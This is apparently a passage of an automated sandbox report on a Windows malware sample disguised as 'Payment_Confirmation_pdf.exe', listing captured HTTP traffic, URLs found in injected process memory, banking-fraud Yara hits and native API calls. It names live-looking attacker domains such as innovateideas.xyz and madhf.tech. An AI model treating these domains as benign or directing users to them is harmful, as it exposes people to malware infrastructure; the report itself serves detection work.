</body> </html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 07:56:17 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 07:56:22 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 07:56:24 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: sdiagnhost.exe, 00000013.00000002.2566048825.000000000564A000.00000004.10000000.00040000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2564859615.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://assets.lolipop.jp/img/bnr/bnr_lolipop_ad_001.gif
                      Source: sdiagnhost.exe, 00000013.00000002.2566048825.00000000057DC000.00000004.10000000.00040000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2564859615.0000000003EEC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://batit.aliyun.com/alww.html?id=00000000004252206681
                      Source: Payment_Confirmation_pdf.exe, cQwRvD.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                      Source: Payment_Confirmation_pdf.exe, cQwRvD.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                      Source: sdiagnhost.exe, 00000013.00000002.2566048825.000000000564A000.00000004.10000000.00040000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2564859615.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://js.ad-stir.com/js/adstir.js?20130527
                      Source: Payment_Confirmation_pdf.exe, cQwRvD.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                      Source: Payment_Confirmation_pdf.exe, 00000000.00000002.1426301513.0000000003155000.00000004.00000800.00020000.00000000.sdmp, cQwRvD.exe, 0000000B.00000002.1591356041.00000000031B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: Payment_Confirmation_pdf.exe, cQwRvD.exe.0.drString found in binary or memory: http://tempuri.org/_prof_basesDataSet.xsd
                      Source: Payment_Confirmation_pdf.exe, cQwRvD.exe.0.drString found in binary or memory: http://tempuri.org/_prof_basesDataSet1.xsdEcom.vimeo.api.Properties.Resources
                      Source: Payment_Confirmation_pdf.exe, cQwRvD.exe.0.drString found in binary or memory: http://vimeo.com/api/v2/
                      Source: Payment_Confirmation_pdf.exe, cQwRvD.exe.0.drString found in binary or memory: http://vimeo.com/api/v2/activity/
                      Source: Payment_Confirmation_pdf.exe, cQwRvD.exe.0.drString found in binary or memory: http://vimeo.com/api/v2/album/
                      Source: Payment_Confirmation_pdf.exe, cQwRvD.exe.0.drString found in binary or memory: http://vimeo.com/api/v2/channel/=http://vimeo.com/api/v2/group/
                      Source: Payment_Confirmation_pdf.exe, cQwRvD.exe.0.drString found in binary or memory: http://vimeo.com/api/v2/video/
                      Source: mYtMtAAMpAtCOL.exe, 00000014.00000002.2567539017.000000000594C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.innovateideas.xyz
                      Source: mYtMtAAMpAtCOL.exe, 00000014.00000002.2567539017.000000000594C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.innovateideas.xyz/4wqa/
                      Source: firefox.exe, 00000016.00000002.1959082934.0000000027734000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.madhf.tech/1bkl/?d0s=UY22ibAHSKCKJ9FjPBVzD
                      Source: sdiagnhost.exe, 00000013.00000002.2568400764.000000000776E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: sdiagnhost.exe, 00000013.00000002.2568400764.000000000776E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: sdiagnhost.exe, 00000013.00000002.2568400764.000000000776E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: sdiagnhost.exe, 00000013.00000002.2568400764.000000000776E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: sdiagnhost.exe, 00000013.00000002.2568400764.000000000776E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: sdiagnhost.exe, 00000013.00000002.2568400764.000000000776E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: sdiagnhost.exe, 00000013.00000002.2568400764.000000000776E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: sdiagnhost.exe, 00000013.00000003.1844249556.000000000094A000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000013.00000002.2549013869.0000000000921000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                      Source: sdiagnhost.exe, 00000013.00000003.1844249556.000000000094A000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000013.00000002.2549013869.0000000000944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                      Source: sdiagnhost.exe, 00000013.00000003.1844249556.000000000094A000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000013.00000002.2549013869.0000000000921000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                      Source: sdiagnhost.exe, 00000013.00000003.1844249556.000000000094A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
                      Source: sdiagnhost.exe, 00000013.00000002.2549013869.0000000000921000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033W
                      Source: sdiagnhost.exe, 00000013.00000003.1844249556.000000000094A000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000013.00000002.2549013869.0000000000921000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                      Source: sdiagnhost.exe, 00000013.00000002.2549013869.0000000000921000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                      Source: sdiagnhost.exe, 00000013.00000003.1843182135.0000000007744000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                      Source: sdiagnhost.exe, 00000013.00000002.2566048825.000000000564A000.00000004.10000000.00040000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2564859615.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lolipop.jp/
                      Source: sdiagnhost.exe, 00000013.00000002.2566048825.000000000564A000.00000004.10000000.00040000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2564859615.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://minne.com/?utm_source=lolipop&utm_medium=banner&utm_campaign=synergy&utm_content=404
                      Source: sdiagnhost.exe, 00000013.00000002.2566048825.000000000564A000.00000004.10000000.00040000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2564859615.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://pepabo.com/
                      Source: sdiagnhost.exe, 00000013.00000002.2566048825.000000000564A000.00000004.10000000.00040000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2564859615.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.minne.com/files/banner/minne_600x500
                      Source: sdiagnhost.exe, 00000013.00000002.2566048825.000000000564A000.00000004.10000000.00040000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2564859615.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://support.lolipop.jp/hc/ja/articles/360049132953
                      Source: Payment_Confirmation_pdf.exe, cQwRvD.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                      Source: sdiagnhost.exe, 00000013.00000002.2568400764.000000000776E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/

                      E-Banking Fraud

                      barindex
                      Source: Yara matchFile source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000013.00000002.2548468685.0000000000840000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1652562579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2562055554.0000000000C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2562947520.0000000004520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2567539017.00000000058F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1653324065.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2564166926.00000000027C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1655068800.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                      System Summary

                      barindex
                      Source: initial sampleStatic PE information: Filename: Payment_Confirmation_pdf.exe
                      Source: initial sampleStatic PE information: Filename: Payment_Confirmation_pdf.exe
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0042C983 NtClose,10_2_0042C983
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01462B60 NtClose,LdrInitializeThunk,10_2_01462B60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01462DF0 NtQuerySystemInformation,LdrInitializeThunk,10_2_01462DF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01462C70 NtFreeVirtualMemory,LdrInitializeThunk,10_2_01462C70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014635C0 NtCreateMutant,LdrInitializeThunk,10_2_014635C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01464340 NtSetContextThread,10_2_01464340
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01464650 NtSuspendThread,10_2_01464650
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01462BE0 NtQueryValueKey,10_2_01462BE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01462BF0 NtAllocateVirtualMemory,10_2_01462BF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01462B80 NtQueryInformationFile,10_2_01462B80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01462BA0 NtEnumerateValueKey,10_2_01462BA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01462AD0 NtReadFile,10_2_01462AD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01462AF0 NtWriteFile,10_2_01462AF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01462AB0 NtWaitForSingleObject,10_2_01462AB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01462D00 NtSetInformationFile,10_2_01462D00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01462D10 NtMapViewOfSection,10_2_01462D10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01462D30 NtUnmapViewOfSection,10_2_01462D30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01462DD0 NtDelayExecution,10_2_01462DD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01462DB0 NtEnumerateKey,10_2_01462DB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01462C60 NtCreateKey,10_2_01462C60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01462C00 NtQueryInformationProcess,10_2_01462C00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01462CC0 NtQueryVirtualMemory,10_2_01462CC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01462CF0 NtOpenProcess,10_2_01462CF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01462CA0 NtQueryInformationToken,10_2_01462CA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01462F60 NtCreateProcessEx,10_2_01462F60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01462F30 NtCreateSection,10_2_01462F30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01462FE0 NtCreateFile,10_2_01462FE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01462F90 NtProtectVirtualMemory,10_2_01462F90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01462FA0 NtQuerySection,10_2_01462FA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01462FB0 NtResumeThread,10_2_01462FB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01462E30 NtWriteVirtualMemory,10_2_01462E30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01462EE0 NtQueueApcThread,10_2_01462EE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01462E80 NtReadVirtualMemory,10_2_01462E80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01462EA0 NtAdjustPrivilegesToken,10_2_01462EA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01463010 NtOpenDirectoryObject,10_2_01463010
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01463090 NtSetValueKey,10_2_01463090
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014639B0 NtGetContextThread,10_2_014639B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01463D70 NtOpenThread,10_2_01463D70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01463D10 NtOpenProcessToken,10_2_01463D10
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeCode function: 0_2_013BD63C0_2_013BD63C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_004018AF10_2_004018AF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0041893310_2_00418933
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0040119010_2_00401190
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_004101B310_2_004101B3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00416B2E10_2_00416B2E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00416B3310_2_00416B33
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_004103D310_2_004103D3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_004023EA10_2_004023EA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_004023F010_2_004023F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0040E3B310_2_0040E3B3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0040E50310_2_0040E503
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_004026EF10_2_004026EF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_004026F010_2_004026F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00402F7010_2_00402F70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0042EF3310_2_0042EF33
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014B815810_2_014B8158
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0142010010_2_01420100
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014CA11810_2_014CA118
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014E81CC10_2_014E81CC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014F01AA10_2_014F01AA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014C200010_2_014C2000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014EA35210_2_014EA352
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014F03E610_2_014F03E6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0143E3F010_2_0143E3F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014D027410_2_014D0274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014B02C010_2_014B02C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0143053510_2_01430535
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014F059110_2_014F0591
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014E244610_2_014E2446
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014DE4F610_2_014DE4F6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0145475010_2_01454750
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0143077010_2_01430770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0142C7C010_2_0142C7C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0144C6E010_2_0144C6E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0144696210_2_01446962
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014329A010_2_014329A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014FA9A610_2_014FA9A6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0143A84010_2_0143A840
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0143284010_2_01432840
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0145E8F010_2_0145E8F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014168B810_2_014168B8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014EAB4010_2_014EAB40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014E6BD710_2_014E6BD7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0142EA8010_2_0142EA80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0143AD0010_2_0143AD00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014CCD1F10_2_014CCD1F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0142ADE010_2_0142ADE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01448DBF10_2_01448DBF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01430C0010_2_01430C00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01420CF210_2_01420CF2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014D0CB510_2_014D0CB5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A4F4010_2_014A4F40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01472F2810_2_01472F28
